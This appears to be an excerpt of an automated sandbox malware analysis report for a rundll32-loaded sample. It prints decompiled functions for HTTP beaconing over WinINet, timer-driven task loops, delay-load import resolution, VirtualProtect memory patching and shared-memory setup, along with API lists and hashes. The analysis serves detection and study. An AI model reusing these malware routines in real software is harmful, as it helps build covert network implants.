                                                          • API ID: CriticalSectionSleep$Close$ChangeDeleteFindFreeHandleNotification$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                                                          • String ID:
                                                          • API String ID: 1259384122-0
                                                          • Opcode ID: 5b465d91640e1c361e77fefd1f9068b0efe52dc452e03e55d697f00102c0ffd3
                                                          • Instruction ID: c1ca888d126080d74e59190316de0c93ccd0294680afedae01344b8b14ddec3a
                                                          • Opcode Fuzzy Hash: 5b465d91640e1c361e77fefd1f9068b0efe52dc452e03e55d697f00102c0ffd3
                                                          • Instruction Fuzzy Hash: 9E414C71B21313ABDBA0EF69FD8CE1977AAAB86744B450025EF00D7290DB71D940DEB4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 92%
                                                          			E036D7AF1(void* __eax, void* __ecx, long __esi, char* _a4) {
                                                          				void _v8;
                                                          				long _v12;
                                                          				void _v16;
                                                          				void* _t34;
                                                          				void* _t38;
                                                          				void* _t40;
                                                          				char* _t56;
                                                          				long _t57;
                                                          				void* _t58;
                                                          				intOrPtr _t59;
                                                          				long _t65;
                                                          
                                                          				_t65 = __esi;
                                                          				_t58 = __ecx;
                                                          				_v16 = 0xea60;
                                                          				__imp__( *(__esi + 4));
                                                          				_v12 = __eax + __eax;
                                                          				_t56 = E036D6D63(__eax + __eax + 1);
                                                          				if(_t56 != 0) {
                                                          					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
                                                          						E036D6C2C(_t56);
                                                          					} else {
                                                          						E036D6C2C( *(__esi + 4));
                                                          						 *(__esi + 4) = _t56;
                                                          					}
                                                          				}
                                                          				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                                                          				 *(_t65 + 0x10) = _t34;
                                                          				if(_t34 == 0 || InternetSetStatusCallback(_t34, E036D7A86) == 0xffffffff) {
                                                          					L15:
                                                          					return GetLastError();
                                                          				} else {
                                                          					ResetEvent( *(_t65 + 0x1c));
                                                          					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
                                                          					 *(_t65 + 0x14) = _t38;
                                                          					if(_t38 != 0 || GetLastError() == 0x3e5 && E036D6E40( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                                                          						_t59 =  *0x36da348; // 0x228d5a8
                                                          						_t15 = _t59 + 0x36db73b; // 0x544547
                                                          						_v8 = 0x84404000;
                                                          						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
                                                          						 *(_t65 + 0x18) = _t40;
                                                          						if(_t40 == 0) {
                                                          							goto L15;
                                                          						}
                                                          						_t57 = 4;
                                                          						_v12 = _t57;
                                                          						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
                                                          							_v8 = _v8 | 0x00000100;
                                                          							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                                                          						}
                                                          						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                                                          							goto L15;
                                                          						} else {
                                                          							return 0;
                                                          						}
                                                          					} else {
                                                          						goto L15;
                                                          					}
                                                          				}
                                                          			}

                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000008,76C84D40), ref: 036D7B03
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 036D7B26
                                                          • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 036D7B4E
                                                          • InternetSetStatusCallback.WININET(00000000,036D7A86), ref: 036D7B65
                                                          • ResetEvent.KERNEL32(?), ref: 036D7B77
                                                          • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 036D7B8A
                                                          • GetLastError.KERNEL32 ref: 036D7B97
                                                          • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 036D7BDD
                                                          • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 036D7BFB
                                                          • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 036D7C1C
                                                          • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 036D7C28
                                                          • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 036D7C38
                                                          • GetLastError.KERNEL32 ref: 036D7C42
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                                          • String ID:
                                                          • API String ID: 2290446683-0
                                                          • Opcode ID: d9c0fa19a005961aa108f51328f8f46bee7dc9a55e00ac48b90894479145ca37
                                                          • Instruction ID: 8ad98c52f701801d43dae95597ae516f97f7f305bdd98d5de09b181c2d881080
                                                          • Opcode Fuzzy Hash: d9c0fa19a005961aa108f51328f8f46bee7dc9a55e00ac48b90894479145ca37
                                                          • Instruction Fuzzy Hash: 9A418C71D00204BFD731AFA5DD49E6BBFBDEB49704F145928F502E2298E771A614DB20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Control-flow graph (interactive rendering omitted): basic blocks 0x036d7f35-0x036d816f; blocks call RaiseException, LoadLibraryA, GetLastError, InterlockedExchange, FreeLibrary, LocalAlloc and GetProcAddress.
                                                          C-Code - Quality: 51%
                                                          			E036D7F35(long _a4, long _a8) {
                                                          				signed int _v8;
                                                          				intOrPtr _v16;
                                                          				LONG* _v28;
                                                          				long _v40;
                                                          				long _v44;
                                                          				long _v48;
                                                          				CHAR* _v52;
                                                          				long _v56;
                                                          				CHAR* _v60;
                                                          				long _v64;
                                                          				signed int* _v68;
                                                          				char _v72;
                                                          				signed int _t76;
                                                          				signed int _t80;
                                                          				signed int _t81;
                                                          				intOrPtr* _t82;
                                                          				intOrPtr* _t83;
                                                          				intOrPtr* _t85;
                                                          				intOrPtr* _t90;
                                                          				intOrPtr* _t95;
                                                          				intOrPtr* _t98;
                                                          				struct HINSTANCE__* _t99;
                                                          				void* _t102;
                                                          				intOrPtr* _t104;
                                                          				void* _t115;
                                                          				long _t116;
                                                          				void _t125;
                                                          				void* _t131;
                                                          				signed short _t133;
                                                          				struct HINSTANCE__* _t138;
                                                          				signed int* _t139;
                                                          
                                                          				_t139 = _a4;
                                                          				_v28 = _t139[2] + 0x36d0000;
                                                          				_t115 = _t139[3] + 0x36d0000;
                                                          				_t131 = _t139[4] + 0x36d0000;
                                                          				_v8 = _t139[7];
                                                          				_v60 = _t139[1] + 0x36d0000;
                                                          				_v16 = _t139[5] + 0x36d0000;
                                                          				_v64 = _a8;
                                                          				_v72 = 0x24;
                                                          				_v68 = _t139;
                                                          				_v56 = 0;
                                                          				asm("stosd");
                                                          				_v48 = 0;
                                                          				_v44 = 0;
                                                          				_v40 = 0;
                                                          				if(( *_t139 & 0x00000001) == 0) {
                                                          					_a8 =  &_v72;
                                                          					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                          					return 0;
                                                          				}
                                                          				_t138 =  *_v28;
                                                          				_t76 = _a8 - _t115 >> 2 << 2;
                                                          				_t133 =  *(_t131 + _t76);
                                                          				_a4 = _t76;
                                                          				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                          				_v56 = _t80;
                                                          				_t81 = _t133 + 0x36d0002;
                                                          				if(_t80 == 0) {
                                                          					_t81 = _t133 & 0x0000ffff;
                                                          				}
                                                          				_v52 = _t81;
                                                          				_t82 =  *0x36da1c0; // 0x0
                                                          				_t116 = 0;
                                                          				if(_t82 == 0) {
                                                          					L6:
                                                          					if(_t138 != 0) {
                                                          						L18:
                                                          						_t83 =  *0x36da1c0; // 0x0
                                                          						_v48 = _t138;
                                                          						if(_t83 != 0) {
                                                          							_t116 =  *_t83(2,  &_v72);
                                                          						}
                                                          						if(_t116 != 0) {
                                                          							L32:
                                                          							 *_a8 = _t116;
                                                          							L33:
                                                          							_t85 =  *0x36da1c0; // 0x0
                                                          							if(_t85 != 0) {
                                                          								_v40 = _v40 & 0x00000000;
                                                          								_v48 = _t138;
                                                          								_v44 = _t116;
                                                          								 *_t85(5,  &_v72);
                                                          							}
                                                          							return _t116;
                                                          						} else {
                                                          							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                          								L27:
                                                          								_t116 = GetProcAddress(_t138, _v52);
                                                          								if(_t116 == 0) {
                                                          									_v40 = GetLastError();
                                                          									_t90 =  *0x36da1bc; // 0x0
                                                          									if(_t90 != 0) {
                                                          										_t116 =  *_t90(4,  &_v72);
                                                          									}
                                                          									if(_t116 == 0) {
                                                          										_a4 =  &_v72;
                                                          										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                          										_t116 = _v44;
                                                          									}
                                                          								}
                                                          								goto L32;
                                                          							} else {
                                                          								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                          								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                          									_t116 =  *(_a4 + _v16);
                                                          									if(_t116 != 0) {
                                                          										goto L32;
                                                          									}
                                                          								}
                                                          								goto L27;
                                                          							}
                                                          						}
                                                          					}
                                                          					_t98 =  *0x36da1c0; // 0x0
                                                          					if(_t98 == 0) {
                                                          						L9:
                                                          						_t99 = LoadLibraryA(_v60); // executed
                                                          						_t138 = _t99;
                                                          						if(_t138 != 0) {
                                                          							L13:
                                                          							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                          								FreeLibrary(_t138);
                                                          							} else {
                                                          								if(_t139[6] != 0) {
                                                          									_t102 = LocalAlloc(0x40, 8);
                                                          									if(_t102 != 0) {
                                                          										 *(_t102 + 4) = _t139;
                                                          										_t125 =  *0x36da1b8; // 0x0
                                                          										 *_t102 = _t125;
                                                          										 *0x36da1b8 = _t102;
                                                          									}
                                                          								}
                                                          							}
                                                          							goto L18;
                                                          						}
                                                          						_v40 = GetLastError();
                                                          						_t104 =  *0x36da1bc; // 0x0
                                                          						if(_t104 == 0) {
                                                          							L12:
                                                          							_a8 =  &_v72;
                                                          							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                          							return _v44;
                                                          						}
                                                          						_t138 =  *_t104(3,  &_v72);
                                                          						if(_t138 != 0) {
                                                          							goto L13;
                                                          						}
                                                          						goto L12;
                                                          					}
                                                          					_t138 =  *_t98(1,  &_v72);
                                                          					if(_t138 != 0) {
                                                          						goto L13;
                                                          					}
                                                          					goto L9;
                                                          				}
                                                          				_t116 =  *_t82(0,  &_v72);
                                                          				if(_t116 != 0) {
                                                          					goto L33;
                                                          				}
                                                          				goto L6;
                                                          			}
Instruction address column (0x036d7f44 to 0x036d8167, one address per decompiled line in the side-by-side listing; the column itself is not reproduced here)

                                                          APIs
                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 036D7FAE
                                                          • LoadLibraryA.KERNEL32(?), ref: 036D802B
                                                          • GetLastError.KERNEL32 ref: 036D8037
                                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 036D806A
                                                          Strings
                                                          Memory Dump Source
• Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
• Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                          • String ID: $
                                                          • API String ID: 948315288-3993045852
                                                          • Opcode ID: 0efa18422d27dbf43e4fa2e708f60293a5687c0d33dc7af5b765c11cede02a89
                                                          • Instruction ID: 8db35b79daa2478cdb8a01fece4552abd965b92dfc4a36b5136c4df6b8b5da00
                                                          • Opcode Fuzzy Hash: 0efa18422d27dbf43e4fa2e708f60293a5687c0d33dc7af5b765c11cede02a89
                                                          • Instruction Fuzzy Hash: 8C810971E01305AFDB20DFA9E984BAEBBF9BB48710F148129E905E7344E770E945CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

Legend (node colouring in the original graph, not reproduced): Executed / Not Executed
control_flow_graph (one basic block per line; "a->b" is an edge from block a to block b)
285 36d661d-36d664f memset CreateWaitableTimerA
286 36d6655-36d66ae _allmul SetWaitableTimer WaitForMultipleObjects 285->286
287 36d67d0-36d67d6 GetLastError 285->287
289 36d6738-36d673e 286->289
290 36d66b4-36d66b7 286->290
288 36d67da-36d67e4 287->288
291 36d673f-36d6743 289->291
292 36d66b9 call 36d216c 290->292
293 36d66c2 290->293
294 36d6745-36d674d RtlFreeHeap 291->294
295 36d6753-36d6757 291->295
298 36d66be-36d66c0 292->298
297 36d66cc 293->297
294->295
295->291
299 36d6759-36d6763 CloseHandle 295->299
300 36d66d0-36d66d5 297->300
298->293
298->297
299->288
301 36d66e8-36d6715 call 36d43eb 300->301
302 36d66d7-36d66de 300->302
306 36d6765-36d676a 301->306
307 36d6717-36d6722 301->307
302->301
304 36d66e0 302->304
304->301
309 36d676c-36d6772 306->309
310 36d6789-36d6791 306->310
307->300
308 36d6724-36d672f call 36d70d8 307->308
315 36d6734 308->315
309->289
313 36d6774-36d6787 call 36d561e 309->313
311 36d6797-36d67c5 _allmul SetWaitableTimer WaitForMultipleObjects 310->311
311->300
314 36d67cb 311->314
313->311
314->289
315->289
                                                          C-Code - Quality: 83%
                                                          			E036D661D(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                          				void _v48;
                                                          				long _v52;
                                                          				struct %anon52 _v60;
                                                          				char _v72;
                                                          				long _v76;
                                                          				void* _v80;
                                                          				union _LARGE_INTEGER _v84;
                                                          				struct %anon52 _v92;
                                                          				void* _v96;
                                                          				void* _v100;
                                                          				union _LARGE_INTEGER _v104;
                                                          				long _v108;
                                                          				struct %anon52 _v124;
                                                          				long _v128;
                                                          				struct %anon52 _t46;
                                                          				void* _t51;
                                                          				long _t53;
                                                          				void* _t54;
                                                          				struct %anon52 _t61;
                                                          				long _t65;
                                                          				struct %anon52 _t66;
                                                          				intOrPtr _t68;
                                                          				void* _t69;
                                                          				void* _t73;
                                                          				signed int _t74;
                                                          				void* _t76;
                                                          				void* _t78;
                                                          				void** _t82;
                                                          				signed int _t86;
                                                          				void* _t89;
                                                          
                                                          				_t76 = __edx;
                                                          				_v52 = 0;
                                                          				memset( &_v48, 0, 0x2c);
                                                          				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                          				_v60 = _t46;
                                                          				if(_t46 == 0) {
                                                          					_v92.HighPart = GetLastError();
                                                          				} else {
                                                          					_push(0xffffffff);
                                                          					_push(0xff676980);
                                                          					_push(0);
                                                          					_push( *0x36da2e0);
                                                          					_v76 = 0;
                                                          					_v80 = 0;
                                                          					L036D824A();
                                                          					_v84.LowPart = _t46;
                                                          					_v80 = _t76;
                                                          					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                                                          					_t51 =  *0x36da30c; // 0x2cc
                                                          					_v76 = _t51;
                                                          					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                                                          					_v108 = _t53;
                                                          					if(_t53 == 0) {
                                                          						if(_a8 != 0) {
                                                          							L4:
                                                          							 *0x36da2ec = 5;
                                                          						} else {
                                                          							_t69 = E036D216C(_t76); // executed
                                                          							if(_t69 != 0) {
                                                          								goto L4;
                                                          							}
                                                          						}
                                                          						_v104.LowPart = 0;
						L6:
                                                          						if(_v104.LowPart == 1 && ( *0x36da300 & 0x00000001) == 0) {
                                                          							_v104.LowPart = 2;
                                                          						}
                                                          						_t74 = _v104.LowPart;
                                                          						_t58 = _t74 << 4;
                                                          						_t78 = _t89 + (_t74 << 4) + 0x38;
                                                          						_t75 = _t74 + 1;
                                                          						_v92.LowPart = _t74 + 1;
                                                          						_t61 = E036D43EB( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
                                                          						_v124 = _t61;
                                                          						if(_t61 != 0) {
                                                          							goto L17;
                                                          						}
                                                          						_t66 = _v92;
                                                          						_v104.LowPart = _t66;
                                                          						if(_t66 != 3) {
                                                          							goto L6;
                                                          						} else {
                                                          							_t68 = E036D70D8(_t75,  &_v72, _a4, _a8); // executed
                                                          							_v124.HighPart = _t68;
                                                          						}
                                                          						goto L12;
                                                          						L17:
                                                          						__eflags = _t61 - 0x10d2;
                                                          						if(_t61 != 0x10d2) {
                                                          							_push(0xffffffff);
                                                          							_push(0xff676980);
                                                          							_push(0);
                                                          							_push( *0x36da2e4);
                                                          							goto L21;
                                                          						} else {
                                                          							__eflags =  *0x36da2e8; // 0x0
                                                          							if(__eflags == 0) {
                                                          								goto L12;
                                                          							} else {
                                                          								_t61 = E036D561E();
                                                          								_push(0xffffffff);
                                                          								_push(0xdc3cba00);
                                                          								_push(0);
                                                          								_push( *0x36da2e8);
                                                          								L21:
                                                          								L036D824A();
                                                          								_v104.LowPart = _t61;
                                                          								_v100 = _t78;
                                                          								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                                                          								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                                                          								_v128 = _t65;
                                                          								__eflags = _t65;
                                                          								if(_t65 == 0) {
                                                          									goto L6;
                                                          								} else {
                                                          									goto L12;
                                                          								}
                                                          							}
                                                          						}
                                                          						L25:
                                                          					}
                                                          					L12:
                                                          					_t82 =  &_v72;
                                                          					_t73 = 3;
                                                          					do {
                                                          						_t54 =  *_t82;
                                                          						if(_t54 != 0) {
                                                          							RtlFreeHeap( *0x36da2d8, 0, _t54); // executed
                                                          						}
                                                          						_t82 =  &(_t82[4]);
                                                          						_t73 = _t73 - 1;
                                                          					} while (_t73 != 0);
                                                          					CloseHandle(_v80);
                                                          				}
                                                          				return _v92.HighPart;
                                                          				goto L25;
                                                          			}

Instruction address column for E036D661D (0x036d661d to 0x036d67e4, one address per decompiled line in the side-by-side listing; the column itself is not reproduced here)

                                                          APIs
                                                          • memset.NTDLL ref: 036D6637
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 036D6643
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 036D666B
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 036D668B
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,036D3EE8,?), ref: 036D66A6
                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,036D3EE8,?,00000000), ref: 036D674D
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,036D3EE8,?,00000000,?,?), ref: 036D675D
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 036D6797
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 036D67B1
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 036D67BD
                                                            • Part of subcall function 036D216C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05969400,00000000,?,76CDF710,00000000,76CDF730), ref: 036D21BB
                                                            • Part of subcall function 036D216C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05969438,?,00000000,30314549,00000014,004F0053,059693F4), ref: 036D2258
                                                            • Part of subcall function 036D216C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,036D66BE), ref: 036D226A
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,036D3EE8,?,00000000,?,?), ref: 036D67D0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                          • String ID:
                                                          • API String ID: 3521023985-0
                                                          • Opcode ID: 7443dcc3758737742cc244c34467601de2f1d976346cb18d643568cfa3796373
                                                          • Instruction ID: 4f6a097fd5b7cb7a33951f27f2ad416df35a2e14ecd70742f11379d05d22134f
                                                          • Opcode Fuzzy Hash: 7443dcc3758737742cc244c34467601de2f1d976346cb18d643568cfa3796373
                                                          • Instruction Fuzzy Hash: 80517C71809324AFC710EF65DC48DABBBECEB89320F544A1EF8A5D2294D7708554CFA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 318 6271a0a-6271a2b call 6293d64 321 6271a31-6271a32 318->321 322 6271b0d 318->322 323 6271a34-6271a37 321->323 324 6271a98-6271a9f 321->324 325 6271b13-6271b22 VirtualProtect 322->325 326 6271b64-6271b70 call 6293d9f 323->326 327 6271a3d 323->327 330 6271aa1-6271aa8 324->330 331 6271ae0-6271af5 VirtualProtect 324->331 328 6271b24-6271b3a VirtualProtect 325->328 329 6271b3f-6271b45 GetLastError 325->329 334 6271a43-6271a4a 327->334 328->334 329->326 330->331 332 6271aaa-6271ab6 330->332 331->325 333 6271af7-6271b0b 331->333 332->325 336 6271ab8-6271ac5 VirtualProtect 332->336 337 6271adc-6271ade VirtualProtect 333->337 338 6271a8c-6271a93 334->338 339 6271a4c-6271a50 334->339 336->325 341 6271ac7-6271adb 336->341 337->325 338->326 339->338 342 6271a52-6271a6e lstrlen VirtualProtect 339->342 341->337 342->338 343 6271a70-6271a8a lstrcpy VirtualProtect 342->343 343->338
                                                          APIs
                                                          • lstrlen.KERNEL32(?,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000,?,00000000,06290977,0628893A,?,?), ref: 06271A58
                                                          • VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000,?,00000000,06290977), ref: 06271A6A
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 06271A79
                                                          • VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000,?,00000000,06290977), ref: 06271A8A
                                                          • VirtualProtect.KERNEL32(00000001,00000005,00000040,-0000001C,06296040,00000018,062734DB,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000), ref: 06271AC1
                                                          • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000,?,00000000,06290977), ref: 06271ADC
                                                          • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,06296040,00000018,062734DB,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000), ref: 06271AF1
                                                          • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,06296040,00000018,062734DB,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000), ref: 06271B1E
                                                          • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000,?,00000000,06290977), ref: 06271B38
                                                          • GetLastError.KERNEL32(?,00000000,?,062919C5,062994D8,?,?,00000004,00000000,?,00000000,06290977,0628893A,?,?), ref: 06271B3F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3676034644-0
                                                          • Opcode ID: f0858161ba6842cf221759b88905f91ce2d15e59b289ad79728eaa76051973d1
                                                          • Instruction ID: cc653f0134aa87c5c895ff05273c938467e4e29e115b715cbebd7a26f4e2b8b5
                                                          • Opcode Fuzzy Hash: f0858161ba6842cf221759b88905f91ce2d15e59b289ad79728eaa76051973d1
                                                          • Instruction Fuzzy Hash: A8415071A1070A9FDB71CFA4CC49EAAB7F5FF48350F048515EA52A62A0E774E819CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 74%
                                                          			E036D76BB(intOrPtr __edx, void** _a4, void** _a8) {
                                                          				intOrPtr _v8;
                                                          				struct _FILETIME* _v12;
                                                          				short _v56;
                                                          				struct _FILETIME* _t12;
                                                          				intOrPtr _t13;
                                                          				void* _t17;
                                                          				void* _t21;
                                                          				intOrPtr _t27;
                                                          				long _t28;
                                                          				void* _t30;
                                                          
                                                          				_t27 = __edx;
                                                          				_t12 =  &_v12;
                                                          				GetSystemTimeAsFileTime(_t12);
                                                          				_push(0x192);
                                                          				_push(0x54d38000);
                                                          				_push(_v8);
                                                          				_push(_v12);
                                                          				L036D8244();
                                                          				_push(_t12);
                                                          				_v12 = _t12;
                                                          				_t13 =  *0x36da348; // 0x228d5a8
                                                          				_t5 = _t13 + 0x36db87a; // 0x5968e22
                                                          				_t6 = _t13 + 0x36db594; // 0x530025
                                                          				_push(0x16);
                                                          				_push( &_v56);
                                                          				_v8 = _t27;
                                                          				L036D7EAA();
                                                          				_t17 = CreateFileMappingW(0xffffffff, 0x36da34c, 4, 0, 0x1000,  &_v56); // executed
                                                          				_t30 = _t17;
                                                          				if(_t30 == 0) {
                                                          					_t28 = GetLastError();
                                                          				} else {
                                                          					if(GetLastError() == 0xb7) {
                                                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                          						if(_t21 == 0) {
                                                          							_t28 = GetLastError();
                                                          							if(_t28 != 0) {
                                                          								goto L6;
                                                          							}
                                                          						} else {
                                                          							 *_a4 = _t30;
                                                          							 *_a8 = _t21;
                                                          							_t28 = 0;
                                                          						}
                                                          					} else {
                                                          						_t28 = 2;
                                                          						L6:
                                                          						CloseHandle(_t30);
                                                          					}
                                                          				}
                                                          				return _t28;
                                                          			}
                                                          0x036d76bb
                                                          0x036d76c3
                                                          0x036d76c7
                                                          0x036d76cd
                                                          0x036d76d2
                                                          0x036d76d7
                                                          0x036d76da
                                                          0x036d76dd
                                                          0x036d76e2
                                                          0x036d76e3
                                                          0x036d76e6
                                                          0x036d76eb
                                                          0x036d76f2
                                                          0x036d76fc
                                                          0x036d76fe
                                                          0x036d76ff
                                                          0x036d7702
                                                          0x036d771e
                                                          0x036d7724
                                                          0x036d7728
                                                          0x036d7776
                                                          0x036d772a
                                                          0x036d7737
                                                          0x036d7747
                                                          0x036d774f
                                                          0x036d7761
                                                          0x036d7765
                                                          0x00000000
                                                          0x00000000
                                                          0x036d7751
                                                          0x036d7754
                                                          0x036d7759
                                                          0x036d775b
                                                          0x036d775b
                                                          0x036d7739
                                                          0x036d773b
                                                          0x036d7767
                                                          0x036d7768
                                                          0x036d7768
                                                          0x036d7737
                                                          0x036d777d

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,036D3DBA,?,?,4D283A53,?,?), ref: 036D76C7
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 036D76DD
                                                          • _snwprintf.NTDLL ref: 036D7702
                                                          • CreateFileMappingW.KERNELBASE(000000FF,036DA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 036D771E
                                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,036D3DBA,?,?,4D283A53,?), ref: 036D7730
                                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 036D7747
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,036D3DBA,?,?,4D283A53), ref: 036D7768
